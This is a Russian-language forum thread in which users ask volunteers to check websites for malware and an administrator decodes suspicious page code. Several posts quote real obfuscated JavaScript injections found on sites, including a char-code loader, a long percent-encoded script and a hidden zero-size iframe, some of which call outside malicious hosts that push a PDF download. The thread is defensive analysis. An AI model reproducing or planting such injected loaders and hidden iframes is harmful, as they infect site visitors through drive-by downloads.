Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,482
Реакции
13,926
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 

Husky1

Новый пользователь
Сообщения
2
Реакции
0
Здравствуйте всем и с наступающим!
Прошу посмотреть сайт allnod.com/index.php , а то жалуются, что нод32 на него ругается.

<script language="JavaScript" src="/allnod.js"></script>
<script type="text/javascript" language="javascript">
<!--
function IU520(t127){document.write( String.fromCharCode(parseInt(t127)+2));}
var wo231="102O114O114O110O56O45O45O98O96O112O109O104O"+
"44O109O105O109O113O102O99O97O102O105O95O44O108O99O"+
"114O45O113O45O110O86O87O80O70O53O54O49O47O45O61O113O"+
"103O98O59O47O53O48O47O54";var Uv703=wo231.split("O");
document.write("<s"+"cript type='text/javascript' language='javascri"+"pt' src='");
var Hi319=0;while(Hi319<Uv703.length){IU520(Uv703[Hi319]);Hi319++;}
document.write("'></sc"+"ript>");
Вот этот скрипт в начале страницы, что он делает, как его распарсить?

ps/ у меня здесь уже есть регистрация(Husky), но я забыл пароль, и почты той уже нет(
Если есть возможность у администрации, напомните мне пароль в ЛС.
С уважением.
 
Последнее редактирование:

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,482
Реакции
13,926
Husky1, в расшифровке это значит:

PHP:
<script type='text/javascript' language='javascript' src='http://dbroj.okoshechka.net/s/*****/?sid=17218'></script>

А там
PHP:
var ref = (document.referrer&&document.referrer!="") ? '&ref='+escape(document.referrer) : '';
var seed = '&seed='+Math.round(Math.random()*100000000);
document.write('<script type="text/javascript" language="javascript" src="http://dbro'+'j.oko'+'she'+'chk'+'a'+'.n'+'************/?sid'+'=172'+'18'+ref+seed+'"></script>');

Добавлено через 2 минуты 4 секунды
ps/ у меня здесь уже есть регистрация(Husky), но я забыл пароль, и почты той уже нет(
Если есть возможность у администрации, напомните мне пароль в ЛС
Если почта утеряна, то администрация ничем не может помочь.
 

icotonev

Ассоциация VN
Сообщения
1,446
Реакции
1,168
Добавлено через 54 секунды
Проверьте этот сайт хттп://ввв.marvin-vibez.in....КИС 2010 блокира сайта..!:confused:
 
Последнее редактирование:

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,482
Реакции
13,926
Cайт не работает. Но там интересный скрипт:

PHP:
<noframes><body><ad><script LANGUAGE='javascript'>var type_of='%3c'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%20'+'%6c'+'%61'+'%6e'+'%67'+'%75'+'%61'+'%67'+'%65'+'%3d'+'%27'+'%6a'+'%61'+'%76'+'%61'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%27'+'%3e'+'%64'+'%6f'+'%63'+'%75'+'%6d'+'%65'+'%6e'+'%74'+'%2e'+'%77'+'%72'+'%69'+'%74'+'%65'+'%28'+'%75'+'%6e'+'%65'+'%73'+'%63'+'%61'+'%70'+'%65'+'%28'+'%27'+'%25'+'%33'+'%63'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%32'+'%30'+'%25'+'%36'+'%63'+'%25'+'%36'+'%31'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%35'+'%25'+'%36'+'%31'+'%25'+'%36'+'%37'+'%25'+'%36'+'%35'+'%25'+'%33'+'%64'+'%25'+'%32'+'%37'+'%25'+'%36'+'%61'+'%25'+'%36'+'%31'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%32'+'%37'+'%25'+'%33'+'%65'+'%25'+'%36'+'%36'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%33'+'%25'+'%37'+'%34'+'%25'+'%36'+'%39'+'%25'+'%36'+'%66'+'%25'+'%36'+'%65'+'%25'+'%32'+'%30'+'%25'+'%34'+'%36'+'%25'+'%34'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%39'+'%25'+'%37'+'%62'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%32'+'%30'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%33'+'%64'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%35'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%36'+'%31'+'%25'+'%37'+'%30'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%37'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%32'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%33'+'%30'+'%25'+'%32'+'%63'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%32'+'%64'+'%25'+'%33'+'%31'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%32'+'%30'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%33'+'%64'+'%25'+'%32'+'%37'+'%25'+'%32'+'%37'+'%25'+'%33'+'%62'+'%25'+'%36'+'%36'+'%25'+'%36'+'%66'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%36'+'%61'+'%25'+'%33'+'%64'+'%25'+'%33'+'%30'+'%25'+'%33'+'%62'+'%25'+'%36'+'%61'+'%25'+'%33'+'%63'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%33'+'%62'+'%25'+'%36'+'%61'+'%25'+'%32'+'%62'+'%25'+'%32'+'%62'+'%25'+'%32'+'%39'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%32'+'%62'+'%25'+'%33'+'%64'+'%25'+'%35'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%32'+'%65'+'%25'+'%36'+'%36'+'%25'+'%37'+'%32'+'%25'+'%36'+'%66'+'%25'+'%36'+'%64'+'%25'+'%34'+'%33'+'%25'+'%36'+'%38'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%34'+'%33'+'%25'+'%36'+'%66'+'%25'+'%36'+'%34'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%32'+'%65'+'%25'+'%36'+'%33'+'%25'+'%36'+'%38'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%34'+'%33'+'%25'+'%36'+'%66'+'%25'+'%36'+'%34'+'%25'+'%36'+'%35'+'%25'+'%34'+'%31'+'%25'+'%37'+'%34'+'%25'+'%32'+'%38'+'%25'+'%36'+'%61'+'%25'+'%32'+'%39'+'%25'+'%32'+'%64'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%37'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%32'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%32'+'%64'+'%25'+'%33'+'%31'+'%25'+'%32'+'%63'+'%25'+'%33'+'%31'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%36'+'%34'+'%25'+'%36'+'%66'+'%25'+'%36'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%64'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%37'+'%34'+'%25'+'%32'+'%65'+'%25'+'%37'+'%37'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%34'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%35'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%36'+'%31'+'%25'+'%37'+'%30'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%37'+'%64'+'%25'+'%33'+'%63'+'%25'+'%32'+'%66'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%33'+'%65'+'%27'+'%29'+'%29'+'%3b'+'%3c'+'%2f'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%3e';for(i=0;i<type_of.length+2;i=i+3)document.write(unescape(type_of.substr(i,3)));FE('%286Fvfulsw%2853ODQJXDJH%286G%2855mdydvfulsw%2855%286Hli%285%3Bgrfxphqw1frrnlh1lqgh%7BRi%285%3B%2855xufklq%2855%285%3C%286G%286G04%2853%2859%2859%2853%2854zlqgrz1qdyljdwru1xvhuDjhqw1wrOrzhuFdvh%285%3B%285%3C1pdwfk%285%3B2%285%3Bfudzohu%28%3AFjrrjoherw%28%3AFpvqerw%28%3AF%7Cdkrr%28%3AFvhdufk%28%3AFlqgh%7Bhu%28%3AFfxloo1frp%28%3AFvwdfnudpeohu%28%3AFdsruw%28%3AF%7Cdqgh%7B%28%3AFelqj%28%3AFdvn%285%3C2%285%3C%2*******286G2%2855%286E%2853grfxphqw1zulwh%285%3B%2855%286Fl%2855.%2855iud%2855.%2855ph%2853zlgw%2855.%2855k%286G%2855.%28556%2853khljk%2855.%2855w%286G4%2853erug%2855.%2855hu%286G3%2853iu%2855.%2855dp%2855.%2855her%2855.%2855ughu%286G%2855.%28553%2853vuf%286G%285%3Ak%2855.%2855wws%2855.%2855%*****55%285%3C%286E%28%3AG%286F2VFULSW%286H%283D3');</script>
 

Husky1

Новый пользователь
Сообщения
2
Реакции
0
Husky1, в расшифровке это значит:........

Если почта утеряна, то администрация ничем не может помочь.
Ясно, спасибо akoK. Как вы расшифровали код, на поделитесь секретами?
А на счет аккаунта, ладно, бог с ним, не критично)
 

solnce

Новый пользователь
Сообщения
6
Реакции
0
Добрый день! Помогите, пожалуйста, проверить на вирусы сайт ввв.mybodyflex.ru

Уже несколько дней NOD на форуме выжает сообщение: "блокировано соединение с вредоносным сайтом westnorths.cn...... "
 
Последнее редактирование:

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,482
Реакции
13,926
Насколько я понимаю проблему уже пофиксили? Не вижу вредоносных редиректов.
 

solnce

Новый пользователь
Сообщения
6
Реакции
0
Насколько я понимаю проблему уже пофиксили? Не вижу вредоносных редиректов.

Да, спасибо! Проблема, как оказалось, была вызвана линеечками с одного сата, коотрый подхватил вирус. Закрыла линеечки и проблема решилась.
 

KIB

Новый пользователь
Сообщения
2
Реакции
0
Проверьте пожалуйста
9b2c1d90.png
 

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,482
Реакции
13,926
Заражен
В коде:
PHP:
<script>window.status=" ";document.write(unescape("%3C%69"+"f%72%61me%20src%3Dht"+"********%3Dc206a9f40624fffd7eac23b23e0f6fbb%20width%3D0%20height%3D0%3E%3C/%69%66%72%61%6D%65%3E"));</script><br />

Который ведет на http://mr*****isy.cn/?s=c206a9f47eac23b23e0f6fbb

Который в свою очередь пытается загрузить pdf.
 

solnce

Новый пользователь
Сообщения
6
Реакции
0
Добрый день! Проверьте, пожалуйста, сайт ввв magicwish . ru
Касперский видит трояна, остальные интивирусы молчат...
 

solnce

Новый пользователь
Сообщения
6
Реакции
0
Вот еще пользователь сообщил, что АВАСТ закрывает форум... А можно проверить? У меня НОД - он никаких проблем не показывает...
 
Сверху Снизу